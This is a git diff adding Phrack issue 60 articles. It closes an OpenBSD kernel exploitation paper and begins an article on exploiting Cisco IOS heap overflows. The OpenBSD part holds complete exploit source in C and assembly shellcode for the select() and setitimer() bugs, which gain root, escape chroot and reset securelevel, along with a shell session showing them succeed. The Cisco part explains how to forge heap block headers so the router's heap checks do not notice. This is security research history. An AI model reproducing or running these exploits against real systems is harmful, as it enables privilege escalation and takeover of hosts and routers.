+mov  0x14(%ecx),%edx  	# edx = p->p_fd
+mov  %eax,0xc(%edx)   	# p->p_fd->fd_rdir = 0
+
+
+--[ 6.2.3 - securelevel  
+
+
+OpenBSD has 4 different securelevels starting from permanently insecure to
+highly secure mode. The system by default runs at level 1 which is the
+secure mode. Secure mode restrictions are as follows:
+
+-   securelevel may no longer be lowered except by init
+-   /dev/mem and /dev/kmem may not be written to
+-   raw disk devices of mounted file systems are read-only
+-   system immutable and append-only file flags may not be removed
+-   kernel modules may not be loaded or unloaded
+
+Some of these restrictions might complicate further compromise of the
+system. So we should also take care of the securelevel flag and reset it to
+0, which is the insecure level that gives you privileges such as being able
+to load kernel modules to further penetrate the system.
+
+But there were many problems in run time searching of the address of
+securelevel in memory without false positives so I chose to utilize this
+attack at a later stage. The stage that we get uid 0 and break free out of
+jail, now we have all the interfaces available mentioned in section 5.4 to
+query any kernel symbol and retrieve its address.
+
+bash-2.05a# /usr/bin/nm /bsd | grep securelevel
+e05cff38 B _securelevel
+
+For this reason an additional, second stage exploit was crafted (without
+any difference, other then the payload) that executes the following
+assembly routine and returns to user land, using the idtr technique. See
+ex_select_obsd_secl.c in section 10
+
+call moo
+.long 0x12345678     <-- address of securelevel filled by user
+moo:
+pop  %edi
+mov  (%edi),%ebx      # address of securelevel in ebx
+		      # reset security level to 0/insecure
+xor  %eax,%eax        # eax = 0
+mov  %eax,(%ebx)      # securelevel = 0
+
+... 
+
+
+--[ 6.3 - Get root & escape jail
+
+
+All of the above chained into 2 piece of exploit code. Here is the door to
+freedom! (Exploits and payloads can be found in section 10)
+
+bash-2.05a# gcc -o ex ex_select_obsd.c
+bash-2.05a# gcc -o ex2 ex_select_obsd_secl.c
+bash-2.05a# cp ex /var/tmp/jail/
+bash-2.05a# cp ex2 /var/tmp/jail/
+bash-2.05a# nc -v localhost 1024
+id
+uid=32767 gid=32767
+ls /
+bin
+ex
+ex2
+usr
+./ex
+
+
+[*] OpenBSD 2.x - 3.x select() kernel overflow     [*]
+[*] by    Sinan "noir" Eren  -  noir@olympos.org   [*]
+
+
+userland: 0x0000df38 parent_proc: 0xe46373a4
+id
+uid=0(root) gid=32767(nobody)
+uname -a
+OpenBSD kernfu 3.1 GENERIC#59 i386
+ls /
+.cshrc
+.profile
+altroot
+bin
+boot
+bsd
+dev
+etc
+...
+sysctl kern.securelevel
+kern.securelevel = 1
+nm /bsd | grep _securelevel
+e05cff38 B _securelevel
+./ex2 e05cff38
+sysctl kern.securelevel
+kern.securelevel = 0
+
+... ;)
+
+Directly copying the exploit into the jailed environment might seem a bit
+unrealistic but it really is not an issue with system call redirection
+[MAXIMI] or even by using little more imaginative shellcodes, you can
+execute anything from a remote source without any further need for a shell
+interpreter. To the best of my knowledge there is 2 commercial products
+that have already achieved such remote execution simulations. [IMPACT],
+[CANVAS]
+
+
+--[ 7 - Conclusions
+
+
+My goal in writing this paper was try to prove kernel land vulnerabilities
+such as stack overflows and integer conditions can be exploited and lead to
+total control over the system, no matter how strict your user land (i.e.,
+privilege separation) or even kernel land (i.e., chroot, systrace,
+securelevel) enforcements are ... I also tried to contribute to the newly
+raised concepts (greets to Gera) of fail-safe and reusable exploitation
+code generation.
+
+I would like to end this article with my favorite vuln-dev posting of all
+time:
+
+Subject:   RE: OpenSSH Vulns (new?) Priv seperation
+[...]
+reducing root-run code from 27000 to 2500 lines is the important part.
+who cares how many holes there are when it is in /var/empty/sshd chroot
+with no possibility of root :)
+
+XXXXX
+
+[ I CARE. lol! ;)]
+
+
+--[ 8 - Greetings
+
+
+Thanks to Dan and Dave for correcting my English and committing many logic
+fixes. Thanks to certain anonymous people for their help and support.
+
+Greets to: optyx, dan, dave aitel, gera, bind, jeru, #convers
+uberhax0r, olympos and gsu.linux ppl
+
+Most thanks of all to goes to Asli for support, help and her never-ending
+affection. Seni Seviyorum, mosirrr!!
+
+
+--[ 9 -	References
+
+
+- [ESA]     	Exploiting Kernel Buffer Overflows FreeBSD Style
+		http://online.securityfocus.com/archive/1/153336
+
+- [LSD-PL]	Kernel Level Vulnerabilities, 5th Argus Hacking Challenge
+		http://lsd-pl.net/kernel_vulnerabilities.html
+
+- [4.4 BSD]	The Design and Implementation of the 4.4BSD Operating
+		System
+
+- [Intel]	Intel Pentium 4 Processors Manuals
+		http://developer.intel.com/design/Pentium4/manuals/
+
+- [ALEPH1]	Smashing The Stack For Fun And Profit
+		http://www.phrack.org/show.php?p=49&a=14
+
+- [MAXIMI]	Syscall Proxying - Simulating Remote Execution
+		http://www.corest.com/files/files/13/BlackHat2002.pdf
+
+- [IMPACT]	http://www.corest.com/products/coreimpact/index.php
+
+- [CANVAS]	http://www.immunitysec.com/CANVAS
+
+- [ODED]	Big Loop Integer Protection
+		Phrack #60 0x09 by Oded Horovitz
+
+--[ 10 - Code
+
+
+<++> ./ex_kernel/ex_select_obsd.c
+/** 
+ ** OpenBSD 2.x 3.x select() kernel bof exploit
+ ** Sinan "noir" Eren 
+ ** noir@olympos.org | noir@uberhax0r.net
+ ** (c) 2002 
+ **
+ **/   
+
+#include <stdio.h>
+#include <sys/types.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <unistd.h>
+#include <sys/param.h>
+#include <sys/sysctl.h>
+#include <sys/signal.h>
+#include <sys/utsname.h>
+#include <sys/stat.h>
+
+/* kernel_sc.s shellcode */ 
+unsigned char shellcode[] = 
+"\xe8\x0f\x00\x00\x00\x78\x56\x34\x12\xfe\xca\xad\xde\xad\xde\xef\xbe"
+"\x90\x90\x90\x5f\x8b\x0f\x8b\x59\x10\x31\xc0\x89\x43\x04\x8b\x13\x89"
+"\x42\x04\x8b\x51\x14\x89\x42\x0c\x8d\x6c\x24\x68\x0f\x01\x4f\x04\x8b"
+"\x5f\x06\x8b\x93\x00\x04\x00\x00\x8b\x8b\x04\x04\x00\x00\xc1\xe9\x10"
+"\xc1\xe1\x10\xc1\xe2\x10\xc1\xea\x10\x09\xca\x31\xc9\x41\x8a\x1c\x0a"
+"\x80\xfb\xe8\x75\xf7\x8d\x1c\x0a\x41\x8b\x0c\x0a\x83\xc1\x05\x01\xd9"
+"\x89\xcf\x66\xb8\xff\xd0\xfc\xb9\xff\xff\xff\xff\xf2\x66\xaf\x31\xc0"
+"\x57\xc3";
+
+void sig_handler();
+void get_proc(pid_t, struct kinfo_proc *);
+
+int
+main(int argc, char **argv)
+{
+   char *buf, *ptr, *fptr;
+   u_long pgsz, *lptr, pprocadr;
+   struct kinfo_proc kp;
+
+  printf("\n\n[*] OpenBSD 2.x - 3.x select() kernel overflow   [*]\n");
+  printf("[*] by  Sinan \"noir\" Eren  -  noir@olympos.org  [*]\n");
+  printf("\n\n"); sleep(1);
+
+  	 pgsz = sysconf(_SC_PAGESIZE);  
+	 fptr = buf = (char *) malloc(pgsz*4);
+	 if(!buf) { 
+		    perror("malloc"); 
+		    exit(-1);
+		 }
+	 memset(buf, 0x41, pgsz*4);
+
+	buf = (char *) (((u_long)buf & ~pgsz) + pgsz);
+
+	get_proc((pid_t) getppid(), &kp);
+	pprocadr = (u_long) kp.kp_eproc.e_paddr;
+
+	ptr = (char *) (buf + pgsz - 200); /* userland adr */
+	lptr = (long *) (buf + pgsz - 8);
+
+	*lptr++ = 0x12345678; /* saved %ebp */
+	*lptr++ = (u_long) ptr; /*(uadr + 0x1ec0);  saved %eip */
+
+	shellcode[5] = pprocadr & 0xff;
+	shellcode[6] = (pprocadr >> 8) & 0xff;
+	shellcode[7] = (pprocadr >> 16) & 0xff;
+	shellcode[8] = (pprocadr >> 24) & 0xff;
+
+	memcpy(ptr, shellcode, sizeof(shellcode)-1);
+
+        printf("userland: 0x%.8x ", ptr);	
+	printf("parent_proc: 0x%.8x\n", pprocadr);
+
+	if( mprotect((char *) ((u_long) buf + pgsz), (size_t)pgsz,
+						 PROT_WRITE) < 0) {
+		perror("mprotect");	
+		exit(-1);
+	}
+
+	signal(SIGSEGV, (void (*)())sig_handler);
+	select(0x80000000, (fd_set *) ptr, NULL, NULL, NULL);
+
+done:	
+	free(fptr);	
+}	
+
+void
+sig_handler()
+{
+   exit(0);
+}
+
+void
+get_proc(pid_t pid, struct kinfo_proc *kp)
+{
+   u_int arr[4], len;
+
+        arr[0] = CTL_KERN;
+        arr[1] = KERN_PROC;
+        arr[2] = KERN_PROC_PID;
+        arr[3] = pid;
+        len = sizeof(struct kinfo_proc);
+        if(sysctl(arr, 4, kp, &len, NULL, 0) < 0) {
+                perror("sysctl");
+                fprintf(stderr, "this is an unexpected error, rerun!\n");
+                exit(-1);
+        }
+
+}
+<--> ./ex_kernel/ex_select_obsd.c
+<++> ./ex_kernel/ex_select_obsd_secl.c
+/** 
+ ** OpenBSD 2.x 3.x select() kernel bof exploit
+ **
+ ** securelevel reset exploit, this is the second stage attack
+ **
+ ** Sinan "noir" Eren 
+ ** noir@olympos.org | noir@uberhax0r.net
+ ** (c) 2002 
+ **
+ **/   
+
+#include <stdio.h>
+#include <sys/types.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <unistd.h>
+#include <sys/param.h>
+#include <sys/signal.h>
+#include <sys/utsname.h>
+#include <sys/stat.h>
+
+/* sel_sc.s shellcode */
+unsigned char shellcode[] = 
+"\xe8\x04\x00\x00\x00\x78\x56\x34\x12\x5f\x8b\x1f\x31\xc0\x89\x03\x8d"
+"\x6c\x24\x68\x0f\x01\x4f\x04\x8b\x5f\x06\x8b\x93\x00\x04\x00\x00\x8b"
+"\x8b\x04\x04\x00\x00\xc1\xe9\x10\xc1\xe1\x10\xc1\xe2\x10\xc1\xea\x10"
+"\x09\xca\x31\xc9\x41\x8a\x1c\x0a\x80\xfb\xe8\x75\xf7\x8d\x1c\x0a\x41"
+"\x8b\x0c\x0a\x83\xc1\x05\x01\xd9\x89\xcf\x66\xb8\xff\xd0\xfc\xb9\xff"
+"\xff\xff\xff\xf2\x66\xaf\x31\xc0\x57\xc3";
+
+void sig_handler();
+
+int
+main(int argc, char **argv)
+{
+   char *buf, *ptr, *fptr;
+   u_long pgsz, *lptr, secladr;
+
+	if(!argv[1]) {
+	printf("Usage: %s secl_addr\nsecl_addr: /usr/bin/nm /bsd |"
+       	" grep _securelevel\n", argv[0]);
+	exit(0);
+	}
+
+	secladr = strtoul(argv[1], NULL, 16);
+
+  	 pgsz = sysconf(_SC_PAGESIZE);  
+	 fptr = buf = (char *) malloc(pgsz*4);
+	 if(!buf) { 
+		    perror("malloc"); 
+		    exit(-1);
+		 }
+	 memset(buf, 0x41, pgsz*4);
+
+	buf = (char *) (((u_long)buf & ~pgsz) + pgsz);
+
+	ptr = (char *) (buf + pgsz - 200); /* userland adr */
+	lptr = (long *) (buf + pgsz - 8);
+
+	*lptr++ = 0x12345678; /* saved %ebp */
+	*lptr++ = (u_long) ptr; /*(uadr + 0x1ec0);  saved %eip */
+
+	shellcode[5] = secladr & 0xff;
+	shellcode[6] = (secladr >> 8) & 0xff;
+	shellcode[7] = (secladr >> 16) & 0xff;
+	shellcode[8] = (secladr >> 24) & 0xff;
+
+	memcpy(ptr, shellcode, sizeof(shellcode)-1);
+
+	if( mprotect((char *) ((u_long) buf + pgsz), (size_t)pgsz,
+					 PROT_WRITE) < 0) {
+		perror("mprotect");	
+		exit(-1);
+	}
+
+	signal(SIGSEGV, (void (*)())sig_handler);
+	select(0x80000000, (fd_set *) ptr, NULL, NULL, NULL);
+
+done:	
+	free(fptr);	
+}	
+
+void
+sig_handler()
+{
+   exit(0);
+}
+<--> ./ex_kernel/ex_select_obsd_secl.c
+<++> ./ex_kernel/ex_setitimer_obsd.c
+/**
+ ** OpenBSD 2.x 3.x setitimer() kernel memory write exploit 
+ ** Sinan "noir" Eren
+ ** noir@olympos.org | noir@uberhax0r.net
+ ** (c) 2002
+ **
+ **/
+
+#include <stdio.h>
+#include <sys/param.h>
+#include <sys/proc.h>
+#include <sys/time.h>
+#include <sys/sysctl.h>
+
+
+struct itimerval val, oval;
+int which = 0;
+
+int
+main(int argc, char **argv)
+{
+   find_which();
+   setitimer(which, &val, &oval);
+   seteuid(0);
+   setuid(0);
+   printf("uid: %d euid: %d gid: %d \n", getuid(), geteuid(), getgid());
+   execl("/bin/sh", "noir", NULL);
+}
+
+find_which()
+{
+   unsigned int arr[4], len;
+   struct kinfo_proc kp;
+   long stat, cred, rem;
+
+	memset(&val, 0x00, sizeof(val));
+	val.it_interval.tv_sec = 0x00;  //fill this with cr_ref
+	val.it_interval.tv_usec = 0x00;
+	val.it_value.tv_sec = 0x00;
+	val.it_value.tv_usec = 0x00;
+
+	arr[0] = CTL_KERN;
+	arr[1] = KERN_PROC;
+	arr[2] = KERN_PROC_PID;
+	arr[3] = getpid();
+	len = sizeof(struct kinfo_proc);
+	if(sysctl(arr, 4, &kp, &len, NULL, 0) < 0) {
+		perror("sysctl");
+		fprintf(stderr, "this is an unexpected error, rerun!\n");
+		exit(-1);
+	}
+
+	printf("proc: %p\n\n", (u_long) kp.kp_eproc.e_paddr);
+	printf("pc_ucred: %p ", (u_long) kp.kp_eproc.e_pcred.pc_ucred);
+
+	printf("p_ruid: %d\n\n", (u_long) kp.kp_eproc.e_pcred.p_ruid);
+	printf("proc->p_cred->p_ruid: %p, proc->p_stats: %p\n", 
+	(char *) (kp.kp_proc.p_cred) + 4, kp.kp_proc.p_stats);
+        printf("cr_ref: %d\n", (u_long) kp.kp_eproc.e_ucred.cr_ref);
+	
+	cred = (long) kp.kp_eproc.e_pcred.pc_ucred;	
+	stat = (long) kp.kp_proc.p_stats;
+	val.it_interval.tv_sec = kp.kp_eproc.e_ucred.cr_ref;
+	
+	printf("calculating which for u_cred:\n");
+	which = cred - stat - 0x90;
+	rem = ((u_long)which%0x10);
+	printf("which: %.8x reminder: %x\n", which, rem);
+
+	switch(rem) {
+	case 0x8:
+	case 0x4:
+	case 0xc:
+         break;
+	case 0x0:
+	 printf("using u_cred, we will have perminent euid=0\n");
+	 goto out;
+	} 
+			
+	val.it_interval.tv_sec = 0x00;
+	cred = (long) ((char *) kp.kp_proc.p_cred+4);
+	stat = (long) kp.kp_proc.p_stats;
+
+	printf("calculating which for u_cred:\n");
+	which = cred - stat - 0x90;	
+	rem = ((u_long)which%0x10);
+	printf("which: %.8x reminder: %x\n", which, rem);
+
+	switch(rem) {
+	case 0x8:
+	case 0x4:
+	 printf("too bad rem is fucked!\nlet me know about this!!\n"); 
+         exit(0);
+	case 0x0:
+	 break;
+	case 0xc:
+	 which += 0x10;
+	} 
+	printf("\nusing p_cred instead of u_cred, only the new process "
+	       "will be priviliged\n");
+
+out:
+	which = which >> 4;
+	printf("which: %.8x\n", which);	
+	printf("addr to overwrite: %.8x\n", stat + 0x90 + (which * 0x10));
+}
+<--> ./ex_kernel/ex_setitimer_obsd.c
+<++> ./ex_kernel/kernel_sc.s
+# kernel level shellcode
+# noir@olympos.org |  noir@uberhax0r.net
+# 2002
+.text
+	.align 2,0x90
+
+.globl _main
+	.type	_main , @function
+_main:
+
+call moo
+.long 0x12345678
+.long 0xdeadcafe
+.long 0xbeefdead
+nop
+nop
+nop
+moo:
+pop  %edi
+mov  (%edi),%ecx      # parent's proc addr on ecx
+
+# update p_cred->p_ruid
+mov  0x10(%ecx),%ebx  # ebx = p_cred 
+xor  %eax,%eax        # eax = 0
+mov  %eax,0x4(%ebx)
+# p_ruid = 0
+
+# update pc_ucred->cr_uid
+mov  (%ebx),%edx      # edx = pc_ucred
+mov  %eax,0x4(%edx)
+# cr_uid = 0
+
+# update p_fd->fd_rdir to break chroot()
+mov  0x14(%ecx),%edx # edx = p_fd
+mov  %eax,0xc(%edx)
+# p_fd->fd_rdir = 0
+
+lea  0x68(%esp),%ebp
+# set ebp to normal
+
+# find where to return: sidt technique
+sidt 0x4(%edi)
+mov  0x6(%edi),%ebx   # mov _idt_region in eax
+mov  0x400(%ebx),%edx # _idt_region[0x80 * (2*long) = 0x400]
+mov  0x404(%ebx),%ecx # _idt_region[0x404]
+shr  $0x10,%ecx
+sal  $0x10,%ecx
+sal  $0x10,%edx
+shr  $0x10,%edx
+or   %ecx,%edx        # edx = ecx | edx; _Xosyscall_end
+
+# search for Xosyscall_end+XXX: call _syscall instruction
+
+xor  %ecx,%ecx
+up:
+inc  %ecx
+movb (%edx,%ecx),%bl
+cmpb $0xe8,%bl
+jne  up
+
+lea  (%edx,%ecx),%ebx # _Xosyscall_end+%ecx: call _syscall
+inc  %ecx
+mov  (%edx,%ecx),%ecx # take the displacement of the call ins.
+add  $0x5,%ecx        # add 5 to displacement
+add  %ebx,%ecx        # ecx = _Xosyscall_end+0x20 + disp
+
+# search for _syscall+0xXXX: call *%eax 
+# and return to where we were supposed to!
+# _syscall+0x240: ff
+# _syscall+0x241: d0	0x240,0x241 on obsd3.1
+
+mov  %ecx,%edi         # ecx is addr of _syscall
+movw $0xd0ff,%ax
+cld
+mov  $0xffffffff,%ecx 
+repnz 
+scasw    #scan (%edi++) for %ax
+
+#return to *%edi
+xor  %eax,%eax  #set up the return value to Success ;)
+push %edi
+ret
+<--> ./ex_kernel/kernel_sc.s
+<++> ./ex_kernel/secl_sc.s
+# securelevel reset shellcode
+# noir@olympos.org |  noir@uberhax0r.net
+# 2002
+.text
+	.align 2,0x90
+.globl _main
+	.type	_main , @function
+_main:
+call moo
+.long 0x12345678
+moo:
+pop  %edi
+mov  (%edi),%ebx      # address of securelevel
+
+xor  %eax,%eax        # eax = 0
+mov  %eax,(%ebx)
+# securelevel = 0
+
+lea  0x68(%esp),%ebp
+# set ebp to normal
+
+# find where to return: sidt technique
+sidt 0x4(%edi)
+mov  0x6(%edi),%ebx   # mov _idt_region in eax
+mov  0x400(%ebx),%edx # _idt_region[0x80 * (2*long) = 0x400]
+mov  0x404(%ebx),%ecx # _idt_region[0x404]
+shr  $0x10,%ecx
+sal  $0x10,%ecx
+sal  $0x10,%edx
+shr  $0x10,%edx
+or   %ecx,%edx        # edx = ecx | edx; _Xosyscall_end
+
+# search for Xosyscall_end+XXX: call _syscall instruction
+
+xor  %ecx,%ecx
+up:
+inc  %ecx
+movb (%edx,%ecx),%bl
+cmpb $0xe8,%bl
+jne  up
+
+lea  (%edx,%ecx),%ebx # _Xosyscall_end+%ecx: call _syscall
+inc  %ecx
+mov  (%edx,%ecx),%ecx # take the displacement of the call ins.
+add  $0x5,%ecx        # add 5 to displacement
+add  %ebx,%ecx        # ecx = _Xosyscall_end+0x20 + disp
+
+# search for _syscall+0xXXX: call *%eax 
+# and return to where we were supposed to!
+# _syscall+0x240: ff
+# _syscall+0x241: d0	OBSD3.1
+
+mov  %ecx,%edi         # ecx is addr of _syscall
+movw $0xd0ff,%ax
+cld
+mov  $0xffffffff,%ecx 
+repnz 
+scasw    #scan (%edi++) for %ax
+
+#return to *%edi
+xor  %eax,%eax  #set up the return value to Success ;)
+push %edi
+ret
+<--> ./ex_kernel/secl_sc.s
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack60/7.txt b/phrack60/7.txt
new file mode 100644
index 0000000..26158ea
--- /dev/null
+++ b/phrack60/7.txt
@@ -0,0 +1,897 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x3c, Phile #0x07 of 0x10
+
+|=-------------=[ Burning the bridge: Cisco IOS exploits ]=--------------=|
+|=-----------------------------------------------------------------------=|
+|=----------------=[ FX of Phenoelit <fx@phenoelit.de> ]=----------------=|
+
+--[ Contents
+
+  1 - Introduction and Limitations
+  2 - Identification of an overflow
+  3 - IOS memory layout sniplets
+  4 - A free() exploit materializes
+  5 - Writing (shell)code for Cisco
+  6 - Everything not covered in 1-5
+
+--[ 1 - Introduction and Limitations
+
+This article is to introduce the reader into the fun land of exploiting a
+routing device made by Cisco Systems. It is not the final word on this
+toppic and merely reflects our research results.
+
+According to Cisco Systems, around 85% of all software issues in IOS are
+the direct or indirect result of memory corruptions. By the time of this
+writing, yours truly is not aware of one single case, where overflowing
+something in Cisco IOS led to a direct overwrite of a return address.
+Although there are things like stacks in IOS, it seems to be very uncommon
+for IOS coders to use local function buffers. Therefore, most (if not all)
+overflows we will encounter are some way or anyother heap based.
+
+As a fellow researcher used to say, bugs are not an unlimited resource.
+Especially overflow bugs in Cisco IOS are fairly rare and not easily
+compared to each other. This article will therefore limit the discussion
+to one particular bug: the Cisco IOS TFTP server filename overflow. When
+using your router as a TFTP server for files in the flash filesystem, a
+TFTP GET request with a long (700 characters) filename will cause the
+router to crash. This happens in all IOS versions from 11.1 to 11.3. The
+reader might argue the point that this is no longer a widely used branch,
+but yours truly asks you to bare with him to the end of this article.
+
+The research results and methods presented here were collected during
+inspection and exploitation attempts using the already mentioned TFTP bug.
+By the time of this writing, other bugs are researched and different
+approaches are tested, but the here presented procedure is still seen as
+the most promising for widespread use. This translates to: use your
+favorite private Cisco IOS overflow and try it.
+
+--[ 2 - Identification of an overflow
+
+While the reader is probably used to identify stack smashing in a split
+second on a commonly used operating system, he might have difficulties
+identifying an overflow in IOS. As yours truly already mentioned, most
+overflows are heap based. There are two different ways in IOS to identify
+a heap overflow when it happens. Being connected to the console, the
+reader might see output like this:
+
+01:14:16: %SYS-3-OVERRUN: Block overrun at 2C01E14 (red zone 41414141)
+-Traceback= 80CCC46 80CE776 80CF1BA 80CF300
+01:14:16: %SYS-6-MTRACE: mallocfree: addr, pc
+  20E3ADC,80CA1D8   20DFBE0,80CA1D8   20CF4FC,80CA1D8   20C851C,80CA1D8
+  20C6F20,80CA1D8   20B43FC,80CA1D8   20AE130,80CA1D8   2075214,80CA1D8
+01:14:16: %SYS-6-MTRACE: mallocfree: addr, pc
+  20651E0,80CA1D8   205EF04,80CA1D8   205B338,80CA1D8   205AB80,80CA1D8
+  20AFCF8,80CA1C6   205A664,80CA1D8   20AC56C,80CA1C6   20B1A88,80CA1C6
+01:14:16: %SYS-6-BLKINFO: Corrupted redzone blk 2C01E14, words 382,
+  alloc 80ABBFC, InUse, dealloc 206E2F0, rfcnt 1
+
+In this case, an IOS process called "Check heaps", of which we will hear
+a lot more later, has identified a problem in the heap structures. After
+doing so, "Check heaps" will cause what we call a software forced crash.
+It means that the process kills the Cisco and makes it reboot in order
+to get rid of the problem. We all know this behavior from users of
+MS-DOS or Windows based systems. What happend here is that an A-Strip
+overwrote a boundary between two heap memory blocks. This is protected by
+what Cisco calls a "RED ZONE", which in fact is just a static canary.
+
+The other way a heap overflow could manifest itself on your console is an
+access violation:
+
+*** BUS ERROR ***
+access address = 0x5f227998
+program counter = 0x80ad45a
+status register = 0x2700
+vbr at time of exception = 0x4000000
+special status word = 0x0045
+faulted cycle was a longword read
+
+This is the case when you are lucky and half of the work is already done.
+IOS used a value that you somehow influenced and referenced to not
+readable memory.  Unfortunately, those overflows are later harder to
+exploit, since tracking is a lot more difficult.
+
+At this point in time, you should try to figure out under which exact
+circumstances the overflow happens - pretty much like with every other bug
+you find. If the lower limit of your buffer size changes, try to make sure
+that you don't play with the console or telnet(1) connections to the router
+during your tests. The best is always to test the buffer length with a just
+rebooted router. While it doesn't change much for most overflows, some
+react differently when the system is freshly rebooted compared to a system
+in use.
+
+--[ 3 - IOS memory layout sniplets
+
+To get any further with the overflow, we need to look at the way IOS
+organizes memory. There are basically two main areas in IOS: process memory
+and IO memory. The later is used for packet buffers, interface ring buffers
+and so on and can be of interest for exploitation but does not provide some
+of the critical things we are looking for. The process memory on the other
+hand behaves a lot like dynamic heap memory in Linux.
+
+Memory in IOS is split up in blocks. There seems to be a number of pointer
+tables and meta structures dealing with the memory blocks and making sure
+IOS can access them in an efficient way. But at the end of the day, the
+blocks are hold together in a linked list structure and store their
+management information mostly inline. This means, every memory block has
+a header, which contains information about the block, it's previous one
+and the next one in the list.
+
+     +--------------+
+ .-- | Block A      | <-.
+ |   +--------------+   |
+ +-> | Block B      | --+
+     +--------------+
+     | Block C      |
+     +--------------+
+
+The command "show memory processor" clearly shows the linked list
+structure.
+
+A memory block itself consists of the block header with all the inline
+management information, the data part where the actual data is stored
+and the red zone, which we already encountered. The format is as follows:
+
+ |<-  32 bit  ->|        Comment
+ +--------------+
+ | MAGIC        |        Static value 0xAB1234CD
+ +--------------+
+ | PID          |        IOS process ID
+ +--------------+
+ | Alloc Check  |	 Area the allocating process uses for checks
+ +--------------+
+ | Alloc name   |        Pointer to string with process name
+ +--------------+
+ | Alloc PC     |	 Code address that allocated this block
+ +--------------+
+ | NEXT BLOCK   |        Pointer to the next block
+ +--------------+
+ | PREV BLOCK   |        Pointer to the previous block
+ +--------------+
+ | BLOCK SIZE   |        Size of the block (MSB marks "in use")
+ +--------------+
+ | Reference #  |        Reference count (again ???)
+ +--------------+
+ | Last Deallc  |	 Last deallocation address
+ +--------------+
+ |   DATA       |
+ |              |
+ ....
+ |              |
+ +--------------+
+ | RED ZONE     |        Static value 0xFD0110DF
+ +--------------+
+
+In case this memory block is used, the size field will have it's most
+significant bit set to one. The size is represented in words (2 bytes),
+and does not include the block overhead. The reference count field is
+obviously designed to keep track of the number of processes using this
+block, but yours truly has never seen this being something else then 1
+or 0. Also, there seem to be no checks for this field in place.
+
+In case the memory block is not used, some more management data is
+introduced at the point where the real data was stored before:
+
+ | [BLOCK HEAD] |
+ +--------------+
+ | MAGIC2       |        Static value 0xDEADBEEF
+ +--------------+
+ | Somestuff    |
+ +--------------+
+ | PADDING      |
+ +--------------+
+ | PADDING      |
+ +--------------+
+ | FREE NEXT    |        Pointer to the next free block
+ +--------------+
+ | FREE PREV    |        Pointer to the previous free block
+ +--------------+
+ |              |
+ ....
+ |              |
+ +--------------+
+ | RED ZONE     |        Static value 0xFD0110DF
+ +--------------+
+
+Therefore, a free block is an element in two different linked lists:
+One for the blocks in general (free or not), another one for the list of
+free memory blocks. In this case, the reference count will be zero and
+the MSB of the size field is not set. Additionally, if a block was used
+at least once, the data part of the block will be filled with 0x0D0D0D0D.
+IOS actually overwrites the block data when a free() takes place to prevent
+software issues from getting out of hand.
+
+At this point, yours truly would like to return to the toppic of the "Check
+heaps" process. It is here to run about once a minute and checks the doubly
+linked lists of blocks. It basically walks them down from top to buttom to
+see if everything is fine. The tests employed seem to be pretty extensive
+compared to common operating systems such as Linux. As far as yours truly
+knows, this is what it checks:
+	1) Doest the block being with MAGIC (0xAB1234CD)?
+	2) If the block is in use (MSB in size field is set), check if the
+	   red zone is there and contains 0xFD0110DF.
+	3) Is the PREV pointer not NULL?
+	4) If there is a NEXT pointer ...
+	4.1) Does it point right after the end of this block?
+	4.2) Does the PREV pointer in the block pointed to by NEXT point
+	     back to this block's NEXT pointer?
+	5) If the NEXT pointer is NULL, does this block end at a memory
+	   region/pool boundary [NOTE: not sure about this one].
+	6) Does the size make sense? [NOTE: The exact test done here is
+	   still unknown]
+
+If one of these tests is not satisfied, IOS will declare itself unhappy and
+perform a software forced crash. To some extend, one can find out which
+test failed by taking a look at the console output line that says
+"validblock_diagnose = 1". The number indicates what could be called "class
+of tests", where 1 means that the MAGIC was not correct, 3 means that the
+address is not in any memory pool and 5 is really a bunch of tests but
+mostly indicates that the tests lined out in point 4.1 and 4.2 failed.
+
+--[ 4 - A free() exploit materializes
+
+Now that we know a bit about the IOS memory structure, we can plan to
+overflow with some more interesting data than just 0x41. The basic idea is
+to overwrite the next block header, hereby provide some data to IOS, and
+let it work with this data in a way that gives us control over the CPU. How
+this is usually done is explained in [1]. The most important difference
+here is, that we first have to make "Check heaps" happy. Unfortunately,
+some of the checks are also performed when memory is allocated or free()ed.
+Therefore, slipping under the timeline of one minute between two "Check
+heaps" runs is not an option here.
+
+The biggest problems are the PREV pointer check and the size field. Since
+the vulnerability we are working with here is a string overflow, we also
+have the problem of not being able to use 0x00 bytes. Let's try to deal
+with the issues we have one by one.
+
+The PREV pointer has to be correct. Yours truly has not found any way to
+use arbitrary values here. The check outlined in the checklist as 4.2 is a
+serious problem, since it is done on the block we are sitting in - not the
+one we are overflowing. To illustrate the situation:
+
+     +--------------+
+     | Block Head   |
+     ...
+     | AAAAAAAAAAAA |    <--- You are here
+     | AAAAAAAAAAAA |
+     | AAAAAAAAAAAA |
+     +--------------+
+     | RED ZONE     |    <--- Your data here
+     +==============+
+     | Block Head   |
+     ...
+
+We will call the uppermost block, who's data part we are overflowing, the
+"host block", because it basically "hosts" our evildoing. For the sake of
+clarity, we will call the overwritten block header the "fake block", since
+we try to fake it's contents.
+
+So, when "Check heaps" or comparable checks during malloc() and free() are
+performed on our host block, the overwrite is already noticed. First of
+all, we have to append the red zone canary to our buffer. If we overflow
+exactly with the number of bytes the buffer can hold and append the red
+zone dword 0xFD0110DF, "Check heaps" will not complain. From here one, it's
+fair game up to the PREV ptr - because the values are either static (MAGIC)
+or totally ignored (PID, Alloc ptrs).
+
+Assumed we overwrite RED ZONE, MAGIC, PID, the three Alloc pointer, NEXT
+and PREV, a check performed on the host block will already trigger a
+software forced crash, since the PREV pointer we overwrote in the next
+block does not point back to the host block. We have only one way today to
+deal with this issue: we crash the device. The reason behind this is, that
+we put it in a fairly predictable memory state. After a reboot, the memory
+is more or less structured the same way. This also depends on the amount
+of memory available in the device we are attacking and it's certainly not a
+good solution. When crashing the device the first time with an A-Strip, we
+can try to grab logging information off the network or the syslog server if
+such a thing is configured. Yours truly is totally aware of the fact that
+this prevents real-world application of the technique. For this article,
+let's just assume you can read the console output.
+
+Now that we know the PREV pointer to put into the fake block, let's go on.
+For now ignoring the NEXT pointer, we have to deal with the size field. The
+fact that this is a 32bit field and we are doing a string overflow prevents
+us from putting reasonable numbers in there. The smallest number for a used
+block would be 0x80010101 and for an unused one 0x01010101. This is much
+more than IOS would accept. But to make a long story short, putting
+0x7FFFFFFF in there will pass the size field checks. As simple as that.
+
+In this particular case, as with many application level service overflows
+in IOS, our host block is one of the last blocks in the chain. The most
